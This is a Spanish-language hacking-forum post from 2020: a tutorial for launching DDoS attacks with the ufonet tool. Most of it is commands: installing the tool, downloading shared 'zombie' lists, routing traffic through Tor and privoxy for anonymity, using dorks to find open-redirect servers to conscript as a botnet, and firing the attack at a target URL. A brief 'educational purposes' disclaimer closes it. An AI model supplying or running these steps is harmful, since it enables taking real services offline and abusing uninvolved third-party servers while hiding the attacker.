Inicio
Blog
Creandolared
Buscar
Ingresar
Registrarse
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
[Tutorial] Ataque DDoS con ufonet
¿Quieres aprender de páginas web? Visita la
comunidad Creandolared
Imprimir
Páginas: [
1
]
Ir Abajo
Autor
Tema: [Tutorial] Ataque DDoS con ufonet (Leído 536 veces)
R3LI4NT
{ L3 } Über
Mensajes: 160
El poder del usuario radica en su ANONIMATO.
[Tutorial] Ataque DDoS con ufonet
«
en:
Diciembre 28, 2020, 10:45:05 pm »
Ufonet (DDoS Tool)
Ufonet es una herramienta free para probar ataques DDos contra un objetivo utilizando vectores "Open Redirect" utilizando aplicaciones de tercero como
Botnet
.
Instalación
Clonamos el repositorio:
Código: Text
- git clone https://github.com/epsylon/ufonet
Instalamos las librerías necesarias (manual):
Código: Text
- pip3 install GeoIP
- pip3 install python-geoip
- pip3 install pygeoip
- pip3 install requests
- pip3 install pycrypto
- pip3 install pycurl
- pip3 install whois
- pip3 install scapy-python3
O lo podemos hacer automáticamente:
Código: Text
- cd ufonet
- python3 setup.py install
Actualizar:
Código: Text
- python3 ufonet --update
Uso
Ver los comandos (help):
Código: Text
- python3 ufonet -h
Descargar los zombies de la comunidad:
Código: Text
- python3 ufonet --download-zombies
Antes de continuar, es recomendable mantener anonimato bajo la red Tor:
Código: Text
- apt-get install tor vidalia
#O
- apt-get install vidalia
- apt-get install privoxy
- apt-get install vidalia privoxy
#--------#
- service tor start
- service privoxy start
- python3 ufonet --check-tor
Encontrar servidores web vulnerables a Open Redirect a través de los dorks que trae por defecto:
Código: Text
- cd /ufonet/botnet/
- cat dorks.txt
- cd ..
- python3 ufonet -v --sd=dorks.txt --proxy="http://127.0.0.1:8118"
Realizar el ataque:
Código: Text
- python3 ufonet -a https://example.com -r 8
#Bajo proxy
- python3 ufonet -a https://example.com -r 8 --proxy="http://127.0.0.1:8080"
Se puede realizar desde la propia GUI:
Código: Text
- python3 ufonet --gui
Esta hecho con fines educativos, el uso inadecuado de esta herramienta es ilegal y puede presentar cargos penales.
Saludos
#R3LI4NT
«
Última modificación: Diciembre 28, 2020, 11:10:53 pm por R3LI4NT
»
En línea
Imprimir
Páginas: [
1
]
Ir Arriba
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
[Tutorial] Ataque DDoS con ufonet
Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso...
OK
Learn more